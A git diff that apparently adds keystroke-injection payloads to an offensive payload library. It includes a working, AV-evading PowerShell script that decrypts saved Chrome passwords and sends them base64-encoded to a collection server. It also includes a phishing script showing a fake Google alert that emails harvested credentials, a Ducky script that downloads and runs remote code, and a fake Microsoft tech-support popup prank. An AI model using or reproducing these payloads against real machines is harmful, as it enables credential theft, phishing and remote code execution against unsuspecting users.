diff --git a/payloads/library/exfiltration/chrome-exfil/README.md b/payloads/library/exfiltration/chrome-exfil/README.md new file mode 100644 index 0000000..c4ddbc9 --- /dev/null +++ b/payloads/library/exfiltration/chrome-exfil/README.md @@ -0,0 +1,55 @@ +# Chrome saved-credentials exfiltration + +A script to exfiltrate Chrome browser credentials from a target. Entered +interactively to bypass a lot of PowerShell-related AV triggers. + +The Chrome GET request exfil is low bandwidth, but shouldn't raise the same +level of AV-detection alarm as Invoke-WebRequest. + +## Dependencies + + * Windows 10 + * PowerShell 5.1
+ (or PowerShell 7.x if you want to capture post-Chrome-v80 passwords) + * Chrome + +## Configuration + +Change `http://localhost:8000/` to match a target-accessible server you've set +up. + +## Example execution + +Passwords stored in Chrome: + +![](img/chrome.png) + +Ducky script running, with temporary Python server to capture the +exfiltration: + +![](img/run.gif) + +The base64 string sent to the server +(`aHR0cHM6Ly9leGFtcGxlLmNvbS8sZXhhbXBsZV91c2VyMSxleEBtcGwzUEFTU3cwckQh`) +decodes to `https://example.com/,example_user1,ex@mpl3PASSw0rD!`. + +## Limitations + +There are various limitations around maximum URL lengths, you may run in to +these with Chrome instances containing a lot of saved passwords. A ZIP +compression pass would probably resolve this, or multiple GET requests. + +I haven't tested this with Unicode passwords. + +## Credits + +This script is based on the minification of my +[chrome-decrypt.ps1](https://github.com/thisismyrobot/chrome-decrypt.ps1) +script, which itself built upon these projects: + + * https://github.com/p0z/CPD + * https://github.com/ValterBricca/SQLite.Net-PCL + * https://github.com/ericsink/SQLitePCL.raw + * https://github.com/byt3bl33d3r/chrome-decrypter + * https://github.com/agentzex/chrome_v80_password_grabber + * https://github.com/0xfd3/Chrome-Password-Recovery diff --git a/payloads/library/exfiltration/chrome-exfil/img/chrome.png b/payloads/library/exfiltration/chrome-exfil/img/chrome.png new file mode 100644 index 0000000..71fc549 Binary files /dev/null and b/payloads/library/exfiltration/chrome-exfil/img/chrome.png differ diff --git a/payloads/library/exfiltration/chrome-exfil/img/run.gif b/payloads/library/exfiltration/chrome-exfil/img/run.gif new file mode 100644 index 0000000..1951175 Binary files /dev/null and b/payloads/library/exfiltration/chrome-exfil/img/run.gif differ diff --git a/payloads/library/exfiltration/chrome-exfil/payload.txt b/payloads/library/exfiltration/chrome-exfil/payload.txt new file mode 100644 index 0000000..ff4226a --- /dev/null +++ b/payloads/library/exfiltration/chrome-exfil/payload.txt @@ -0,0 +1,64 @@ +REM Title: Chrome Exfil +REM Author: thisismyrobot +REM Description: Opens PowerShell, grabs Chrome passwords, exfils via headless Chrome GET request. +REM Target: Windows 10 (PowerShell + Chrome) +REM Version: 1.0 +REM Category: Exfiltration +DEFAULTDELAY 10 +DELAY 5000 +GUI r +DELAY 250 +STRING powershell +ENTER +DELAY 2500 +STRING pwsh +ENTER +DELAY 2500 +STRING $d=Add-Type -A System.Security +ENTER +STRING $p='public static' +ENTER +STRING $g=""")]$p extern" +ENTER +STRING $i='[DllImport("winsqlite3",EntryPoint="sqlite3_' +ENTER +STRING $m="[MarshalAs(UnmanagedType.LP" +ENTER +STRING $q='(s,i)' +ENTER +STRING $f='(p s,int i)' +ENTER +STRING $z=$env:LOCALAPPDATA+'\Google\Chrome\User Data' +ENTER +STRING $u=[Security.Cryptography.ProtectedData] +ENTER +STRING Add-Type "using System.Runtime.InteropServices;using p=System.IntPtr;$p class W{$($i)open$g p O($($m)Str)]string f,out p d);$($i)prepare16_v2$g p P(p d,$($m)WStr)]string l,int n,out p s,p t);$($i)step$g p S(p s);$($i)column_text16$g p C$f;$($i)column_bytes$g int Y$f;$($i)column_blob$g p L$f;$p string T$f{return Marshal.PtrToStringUni(C$q);}$p byte[] B$f{var r=new byte[Y$q];Marshal.Copy(L$q,r,0,Y$q);return r;}}" +ENTER +STRING $s=[W]::O("$z\\Default\\Login Data",[ref]$d) +ENTER +STRING $l=@() +ENTER +STRING if($host.Version-like"7*"){$b=(gc "$z\\Local State"|ConvertFrom-Json).os_crypt.encrypted_key +ENTER +STRING $x=[Security.Cryptography.AesGcm]::New($u::Unprotect([Convert]::FromBase64String($b)[5..($b.length-1)],$n,0))}$_=[W]::P($d,"SELECT*FROM logins WHERE blacklisted_by_user=0",-1,[ref]$s,0) +ENTER +STRING for(;!([W]::S($s)%100)){$l+=[W]::T($s,0),[W]::T($s,3) +ENTER +STRING $c=[W]::B($s,5) +ENTER +STRING try{$e=$u::Unprotect($c,$n,0)}catch{if($x){$k=$c.length +ENTER +STRING $e=[byte[]]::new($k-31) +ENTER +STRING $x.Decrypt($c[3..14],$c[15..($k-17)],$c[($k-16)..($k-1)],$e)}}$l+=($e|%{[char]$_})-join''} +ENTER +STRING $r=[Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes(($l)-join',')) +ENTER +STRING start-process "chrome" "--headless http://localhost:8000/?$r" +ENTER +DELAY 1000 +STRING exit +ENTER +DELAY 250 +STRING exit +ENTER diff --git a/payloads/library/phishing/duckyphish/duckyphish.ps1 b/payloads/library/phishing/duckyphish/duckyphish.ps1 new file mode 100644 index 0000000..2c87593 --- /dev/null +++ b/payloads/library/phishing/duckyphish/duckyphish.ps1 @@ -0,0 +1,13 @@ +clear +$mycredentials = Get-Credential +Write-Host "ALERT your google account has been compromised! please enter your credentials for verification" + +$name = Read-Host "Username/Email" +$pwd = Read-Host "password" + + + + +Send-MailMessage -SmtpServer smtp.gmail.com -Port 587 -UseSsl -From sendingemailhere -To receiveemailhere -Subject 'Hello from the ducky' -Body ("$name $pwd") -Credential ($mycredentials) +exit + diff --git a/payloads/library/phishing/duckyphish/duckyphish.txt b/payloads/library/phishing/duckyphish/duckyphish.txt new file mode 100644 index 0000000..7e1841b --- /dev/null +++ b/payloads/library/phishing/duckyphish/duckyphish.txt @@ -0,0 +1,25 @@ +REM SCRIPT CREATED BY MAKOZORT, WATCH THIS VIDEO ON HOW TO USE IT: https://youtu.be/NeD5kRLatOU +DELAY 1000 +GUI r +DELAY 500 +STRING powershell -w maximized +ENTER +DELAY 200 +REM now we read in the script as a scriptblock +STRING $script = [scriptblock]::Create((New-Object Net.WebClient).DownloadString('LINK HERE')); +DELAY 500 +ENTER +DELAY 2000 +STRING Invoke-Command -ScriptBlock $script +DELAY 500 +ENTER +REM enter credentials for "Get-Credential" powershell module +DELAY 500 +STRING firsthalfofemail +SHIFT 2 +STRING gmail.com +DELAY 500 +TAB +STRING PASSWORD +DELAY 500 +ENTER diff --git a/payloads/library/prank/QuacKed_Again/payload.txt b/payloads/library/prank/QuacKed_Again/payload.txt new file mode 100644 index 0000000..80cd5d8 --- /dev/null +++ b/payloads/library/prank/QuacKed_Again/payload.txt @@ -0,0 +1,44 @@ +REM Title: QuacKed_Again +REM Author: LulzAnarchyAnon +REM Description: A Quack of a different flavor. This time a browser shortcut is created +REM on the targets Desktop, and named mycloudbackup to peak the targets curiosity. +REM It opens a browser image of my favorite Ducky, titled " The Face You Make. +REM When You Get Quacked" A BIT OF SELF-QUACKING just for FUN! +REM Target: Windows 10 +REM Props: Darren Kitchen and Hak5 +REM Version: 1.0 +REM Category: Prank + + +DELAY 100 +MOUSE CLICK 2 +DELAY 100 +DOWNARROW +DELAY 100 +DOWNARROW +DELAY 100 +DOWNARROW +DELAY 100 +DOWNARROW +DELAY 100 +DOWNARROW +DELAY 100 +DOWNARROW +DELAY 100 +DOWNARROW +DELAY 100 +DOWNARROW +DELAY 100 +ENTER +DELAY 100 +DOWNARROW +DELAY 100 +ENTER +DELAY 100 +STRING https://memegenerator.net/img/instances/81735469/the-face-you-make-when-you-get-quacked.jpg +DELAY 100 +ENTER +DELAY 100 +STRING mycloudbackup +DELAY 100 +ENTER diff --git a/payloads/library/prank/WindowS_PoP_uP/WindowS_PoP_uP b/payloads/library/prank/WindowS_PoP_uP/WindowS_PoP_uP new file mode 100644 index 0000000..7411a3d --- /dev/null +++ b/payloads/library/prank/WindowS_PoP_uP/WindowS_PoP_uP @@ -0,0 +1,68 @@ +REM Title: WindowS_PoP_uP +REM Author: LulzAnarchyAnon +REM Description: Old School fun meets modern day with this payload. +REM Description: So for starters notepad is opened, and a few choice words are typed out ;) +REM Afterwards the notepad file is saved as an Error.bat to the Desktop, and notepad closes. +REM The hapless victim notices the new addition to the desktop, and begins to click away having +REM no idea it's just a prank, As they sweat their way with hesitation through each mouse click. +REM Only To See.... THIS IS ONLY A PRANK! at the END! As the last ok is clicked the pop up +REM closes FOREVER! Leaving the victim unsure of what just happened.... :) +REM Target: Windows 10 +REM Props: Darren Kitchen and I am Jakoby +REM Version: 1.0 +REM Category: Prank + + +GUI r +DELAY 20 +STRING notepad +ENTER +DELAY 100 +STRING @echo off +STRING msg * ***COMPUTER HEALTH ALERT*** +DELAY 50 +ENTER +STRING msg * Microsoft Security Error +DELAY 50 +ENTER +STRING msg * Due to suspicious activity on your computer +DELAY 50 +ENTER +STRING msg * Please contact a Microsoft Certified Technician +DELAY 50 +ENTER +STRING msg * +1877-600-4257 (Toll Free) +DELAY 50 +ENTER +STRING msg * Please wait ........... +DELAY 50 +ENTER +STRING msg * Please wait ........... +DELAY 50 +ENTER +STRING msg * Please wait ........... +DELAY 50 +ENTER +STRING msg * Please wait ........... +DELAY 50 +ENTER +STRING msg * THIS IS ONLY A PRANK! +DELAY 50 +CTRL s +DELAY 100 +STRING Microsoft Error.bat +DELAY 200 +ALT d +DELAY 200 +SHIFT +DELAY 200 +SPACE +DELAY 200 +STRING Desktop +DELAY 200 +ENTER +DELAY 200 +ALT s +DELAY 800 +ALT f +SHIFT x